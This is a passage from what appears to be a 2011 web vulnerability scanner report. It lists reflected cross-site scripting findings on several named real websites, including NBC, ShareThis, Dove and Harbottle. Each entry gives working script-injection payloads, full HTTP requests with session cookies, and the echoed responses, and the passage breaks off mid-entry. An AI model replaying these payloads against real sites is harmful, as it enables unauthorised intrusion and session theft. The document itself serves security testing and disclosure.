The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7792f"><script>alert(1)</script>5f008c5eb4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4 HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
wn;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C17%2C104&t=11">
...[SNIP]...

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c33"><script>alert(1)</script>ea769a6fa16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
known;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C104%2C125&t=11">
...[SNIP]...

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26c64<script>alert(1)</script>321541649f9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9 HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:57 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e05fc%3balert(1)//177df2a42e6 was submitted in the cb parameter. This input was echoed as e05fc;alert(1)//177df2a42e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/getCount2.php?cb=stButtons.processCBe05fc%3balert(1)//177df2a42e6&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:13 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 277

(function(){stButtons.processCBe05fc;alert(1)//177df2a42e6({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_
...[SNIP]...

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The value of the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eb5"><script>alert(1)</script>fe65f901e8 was submitted in the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8 HTTP/1.1
Host: www.dove.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29750
Date: Tue, 06 Sep 2011 16:53:45 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="0"
...[SNIP]...

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba088"><script>alert(1)</script>d91bc007f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088"><script>alert(1)</script>d91bc007f7=1 HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29548
Date: Tue, 06 Sep 2011 16:45:50 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088"><script>alert(1)</script>d91bc007f7=1&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="
...[SNIP]...

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c3><img src=a onerror=alert(1)>9d536909165a5febf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hnl/pages/hnl_search2.php/353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5158
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/353c3><img src=a onerror=alert(1)>9d536909165a5febf.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c874d"><script>alert(1)</script>742e151d0f9 was submitted in the search parameter. This input was echoed as c874d\"><script>alert(1)</script>742e151d0f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hnl/pages/hnl_search2.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

search=xssc874d"><script>alert(1)</script>742e151d0f9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 11217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<input type="text" name=search id="txt-search-fld" class="txt-search" value="xssc874d\"><script>alert(1)</script>742e151d0f9" />
...[SNIP]...

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f was submitted in the REST URL parameter 4. This input was echoed as 136b4><img src=a onerror=alert(1)>d7f0728306f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/136b4><img src=a onerror=alert(1)>d7f0728306f.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546 was submitted in the REST URL parameter 4. This input was echoed as 70e82<img src=a onerror=alert(1)>070b3549546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5219
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<img src=a onerror=prompt(document.location)>9d536909165a5febf70e82<img src=a onerror=alert(1)>070b3549546.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 was submitted in the REST URL parameter 4. This input was echoed as b2a8a><img src=a onerror=alert(1)>2ab92f55609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/ab2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:25 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5153
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/ab2a8a><img src=a onerror=alert(1)>2ab92f55609.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 was submitted in the REST URL parameter 5. This input was echoed as 7efde><img src=a onerror=alert(1)>d1b7aafafe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5179
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/Chambers 2011 Firm Logo.jpg7efde><img src=a onerror=alert(1)>d1b7aafafe7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a was submitted in the REST URL parameter 5. This input was echoed as 1e850><img src=a onerror=alert(1)>dd18401005a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/1e850><img src=a onerror=alert(1)>dd18401005a.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 was submitted in the REST URL parameter 5. This input was echoed as e2a6e><img src=a onerror=alert(1)>39a70330b58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

